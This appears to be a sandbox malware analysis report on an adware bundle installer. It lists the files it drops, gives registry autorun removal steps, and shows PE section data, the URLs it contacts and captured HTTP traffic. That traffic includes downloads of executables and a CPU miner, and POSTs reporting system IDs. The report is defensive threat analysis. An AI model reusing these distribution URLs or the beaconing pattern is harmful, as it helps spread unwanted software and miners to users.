%Documents and Settings%\%current user%\Local Settings\Temp\nsd39.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\gamesdesktop_widget.exe (92311 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\upgmsd_re_005010096.exe (24230 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\predm.exe (1447 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\gmsd_re_005010096.exe (31996 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd20.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd20.tmp\amisid.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd20.tmp\registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd20.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd1F.tmp (8776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso22.tmp (8776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\post_reply.htm (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\amisid.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\thankyou[1].php (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj28.tmp (5929 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\amisid.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\checks.txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\thankyou[1].php (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\post_reply.htm (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\header.bmp (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\Offer1.zip (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\GetVersion.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\OfferScreen_460.html (2281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\inner.png (146 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\Offer2.zip (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\FCL_Co_Unq_remote_v5[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\FirstResult.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\DSS_Unq_IMapplication_mon_remote[1].htm (609 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\manlib.dll (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\nsCBHTML5.dll (1660 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\Math.dll (2489 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\OfferScreen_12.html (1681 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\SecondResult.txt (609 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\img12_1.jpg (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\serlib.dll (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\nsisunz.dll (211 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\blowfish.dll (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv7.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\cmmdWriter[1].exe (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\Validate[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst26.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nssB.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\policyname[1].exe (6984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp (989 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdE.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd47.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (90 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx45.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr35.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd13.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA.tmp (11704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\AnyProtectSetup[1].exe (38832 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\7121923af824073a25b2b7e6ba0a6e0e[1].exe (6984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk4.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb18.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv17.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\vos[1].htm (989 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp (5952 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw33.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx36.tmp (6984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3E.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso3D.tmp (14960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\Bundle_CPUminer[1].exe (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (120 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj4C.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss1A.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj32.tmp (17616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse15.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\setup_362[1].exe (17616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdF.tmp (128293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx37.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\setup[1].exe (128293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr43.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi31.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\wEvFLQF[1].exe (11704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr19.tmp (6984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg10.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3C.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk6.tmp (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2C.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx46.tmp (38832 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw11.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss24.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\36e0f22eacad857de2cd3b76aedc24a7[1].exe (5952 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\VuuPC_VO2_8907[1].exe (14960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2A.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf2B.tmp (365499 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv41.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst25.tmp (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw42.tmp (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\setup_gmsd_re[1].exe (365499 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"upgmsd_re_005010096.exe" = "%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\upgmsd_re_005010096.exe -runhelper"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"gmsd_re_005010096" = "%Program Files%\gmsd_re_005010096\gmsd_re_005010096.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name:
Product Name:
Product Version: 1.0.0.1
Legal Copyright: Copyright 2013
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.1
File Description:
Comments:
Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 23628 | 24064 | 4.46394 | 856b32eb77dfd6fb67f21d6543272da5 |
.rdata | 28672 | 4764 | 5120 | 3.4982 | dc77f8a1e6985a4361c55642680ddb4f |
.data | 36864 | 154712 | 1024 | 3.3278 | 7922d4ce117d7d5b3ac2cffe4b0b5e4f |
.ndata | 192512 | 11665408 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 11857920 | 17152 | 17408 | 4.10655 | a504ed888327f013e9b6042c9ab3920f |
Dropped from:
2258b2fa478c5298d2989e18828980d3
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 12
Network Activity
URLs
URL | IP |
---|---|
hxxp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com/ | 54.163.246.254 |
hxxp://livestatscounter.com/Generic/vos.php?ch=NOCHPC&rdsn=0&idn=0&sid=&isnw=7&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= | 50.7.86.58 |
hxxp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe | 54.239.168.162 |
hxxp://livestatscounter.com/SysInfo/validator/timer.php | 50.7.86.58 |
hxxp://cds.c5z6s5a3.hwcdn.net/69/all/cp/row/setup.exe | |
hxxp://ipgeoapi.com/ | 54.235.206.35 |
hxxp://cds.c5z6s5a3.hwcdn.net/data.gif?app=12345&ibic=8fa23ef88ff78dd88c0c9eef405f1630&verifier=928ea0cf8fffd7869c66f673dcd0cb80&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=3&rnd=9823 | |
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&ibic=8fa23ef88ff78dd88c0c9eef405f1630&verifier=928ea0cf8fffd7869c66f673dcd0cb80&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003266&default=ie&ver=107&crtnm=OralTeams&rnd=6189 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=100&n=install_browser_start_async&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=8864 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=250&n=install_browser_downloading&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=6496 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=270&n=install_browser_all_thread_created_success&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=715 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.002 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.005 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.001 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.003 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.004 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=310&n=install_browser_all_thread_ended_success&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=1932 | |
hxxp://d16hr9n7t75k58.cloudfront.net/36e0f22eacad857de2cd3b76aedc24a7.exe | 54.239.168.52 |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=360&n=install_browser_all_files_in_place&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=4546 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=410&n=install_browser_install_ch_success&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=2118 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=480&n=install_browser_end_success&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=9936 | |
hxxp://cds.c5z6s5a3.hwcdn.net/data.gif?app=12345&ibic=8fa23ef88ff78dd88c0c9eef405f1630&verifier=928ea0cf8fffd7869c66f673dcd0cb80&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=4&rnd=7507 | |
hxxp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe | 54.239.168.47 |
hxxp://cds.r5q6q4j7.hwcdn.net/OperaRUnew/Bundle_OperaRUnew.exe | |
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/thankyou.php | |
hxxp://cds.r5q6q4j7.hwcdn.net/CPUminer/v6/Bundle_CPUminer.exe | |
hxxp://dl.tuto4pc.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe | |
hxxp://prof.eorezo.com/cgi-bin/get_protect.cgi?checking=true&version=gmsd_us_233&forceGEO=US | 37.187.146.33 |
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_INSTALL_INI | 188.165.238.33 |
hxxp://prof.eorezo.com/cgi-bin/get_protect.cgi | 37.187.146.33 |
hxxp://ads.under-myscreen.be/cgi-bin/advert/getkws.cgi?did=90068&version=0&key=azJJ.s8MVPsHc | 94.23.193.213 |
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_INSTALL_F11 | 188.165.238.33 |
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_INSTALL_FIN | 188.165.238.33 |
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_COUNT1 | 188.165.238.33 |
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_DCOUNT1 | 188.165.238.33 |
hxxp://s3-website-us-east-1.amazonaws.com/setup_362.exe | |
hxxp://djapp.info/?domain=afsbdfgds.net&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=362&setup_id=800 | |
hxxp://d22nes4susdva1.cloudfront.net/finalinstaller/24.08.2015/FinalInstaller_dotnet4.exe | 54.239.168.173 |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.002 | 69.16.175.10 |
hxxp://special-bundles.s3-website-us-east-1.amazonaws.com/setup_362.exe | 54.231.33.60 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=310&n=install_browser_all_thread_ended_success&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=1932 | 54.231.9.84 |
hxxp://logs.rgbdomsrv.com/data.gif?app=12345&ibic=8fa23ef88ff78dd88c0c9eef405f1630&verifier=928ea0cf8fffd7869c66f673dcd0cb80&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=3&rnd=9823 | 69.16.175.10 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=410&n=install_browser_install_ch_success&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=2118 | 54.231.9.84 |
hxxp://dl.staticclientstorage.com/69/all/cp/row/setup.exe | 69.16.175.42 |
hxxp://www.software-forus.com/CPUminer/v6/Bundle_CPUminer.exe | 205.185.216.42 |
hxxp://prof.youandmeandmeandyouhihi.com/cgi-bin/get_protect.cgi | 37.187.137.144 |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.001 | 69.16.175.10 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=360&n=install_browser_all_files_in_place&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=4546 | 54.231.9.84 |
hxxp://mystats.rgbdomsrv.com/installer.gif?action=started&ibic=8fa23ef88ff78dd88c0c9eef405f1630&verifier=928ea0cf8fffd7869c66f673dcd0cb80&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003266&default=ie&ver=107&crtnm=OralTeams&rnd=6189 | 54.231.48.154 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=270&n=install_browser_all_thread_created_success&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=715 | 54.231.9.84 |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.003 | 69.16.175.10 |
hxxp://logs.rgbdomsrv.com/data.gif?app=12345&ibic=8fa23ef88ff78dd88c0c9eef405f1630&verifier=928ea0cf8fffd7869c66f673dcd0cb80&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=4&rnd=7507 | 69.16.175.10 |
hxxp://www.djapp.info/?domain=afsbdfgds.net&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=362&setup_id=800 | 52.1.45.42 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=250&n=install_browser_downloading&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=6496 | 54.231.9.84 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=100&n=install_browser_start_async&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=8864 | 54.231.9.84 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=480&n=install_browser_end_success&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=9936 | 54.231.9.84 |
hxxp://www.software-forus.com/OperaRUnew/Bundle_OperaRUnew.exe | 205.185.216.42 |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.005 | 69.16.175.10 |
hxxp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe | 37.59.30.197 |
hxxp://www.downloadsoup.com/thankyou.php | 54.243.139.119 |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.004 | 69.16.175.10 |
s3.amazonaws.com | 54.231.97.211 |
upd.adskyforever.com | 91.121.172.208 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /Generic/vos.php?ch=NOCHPC&rdsn=0&idn=0&sid=&isnw=7&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.3
Date: Fri, 25 Sep 2015 22:45:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.23
GET /SysInfo/validator/timer.php HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.3
Date: Fri, 25 Sep 2015 22:45:11 GMT
Content-Type: application/octet-stream
Content-Length: 165898
Connection: keep-alive
X-Powered-By: PHP/5.5.23
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename=wEvFLQF.exe
GET /cgi-bin/get_protect.cgi?checking=true&version=gmsd_us_233&forceGEO=US HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: prof.eorezo.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 22:46:24 GMT
Server: Apache/2.2.22
x-eorezo-crc32: -1
x-eorezo-crypted: 1
x-eorezo-length: 357
Set-Cookie: conftime=1443221184; expires=Wed, 19 Jan 16 16:33:00 GMT; domain=eorezo.com; path=/;
Set-Cookie: EoRezo=194.242.96.218.1443221184498979; path=/; expires=Sun, 25-Oct-15 22:46:24 GMT
Connection: close
Transfer-Encoding: chunked
Content-Type: text/plain
GET /data.gif?app=12345&ibic=8fa23ef88ff78dd88c0c9eef405f1630&verifier=928ea0cf8fffd7869c66f673dcd0cb80&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=4&rnd=7507 HTTP/1.1
Accept: */*
Host: logs.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 22:45:46 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1443221146.dop005.fr7.t,1443221146.cds054.fr7.c
GIF89a.............,...........D..;..
POST /thankyou.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.downloadsoup.com
Content-Length: 460
Connection: Keep-Alive
Cache-Control: no-cache
cnt=6579010c2b8757be5b4951de6578f753&_srvlog=NSI &browser=un&capp=nsdummy&cid=12216&current_screen=Finish_Last_Screen&is=0&netfs=0&os=&sysid=D6A6947B24975DB6AB9DE8B171C5FA6E&sysid1=D6A6947B24975DB6AB9DE8B171C5FA6E&te=1443221170&ts=1443221169&ver=1.1.2.41&c[CPUminer][s]=-2&c[Updater][s]=8&c[Updater][pi]=1&c[CPUminer][pi]=0&c[CPUminer][e]=0&c[CPUminer][ts]=0&c[CPUminer][te]=0&cmdl=C:\DOCUME~1\adm\LOCALS~1\Temp\nst25.tmp /ci 12216&bti1=
HTTP/1.1 200 OK
Content-Type: text/plain; charset=UTF-8
Date: Fri, 25 Sep 2015 22:46:09 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 14
Connection: keep-alive
.... ....
GET /setup_362.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: special-bundles.s3-website-us-east-1.amazonaws.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: vVxWZJdxxdgnQT708B9JU /SW1Q8fRusemKLJfLzEe5A4acvTkgRWcjTgq7awO0M
x-amz-request-id: 996B60BC172F4DF4
Date: Fri, 25 Sep 2015 22:46:35 GMT
Last-Modified: Wed, 10 Jun 2015 05:41:11 GMT
ETag: "0ccf900044e0e4edf36e89008e2c6aa7"
Content-Type: application/octet-stream
Content-Length: 254464
Server: AmazonS3
<<< skipped >>>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1726\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 22:45:00 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 126
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1727\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"tst=&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 22:45:00 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 177
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 22:45:01 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 190
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
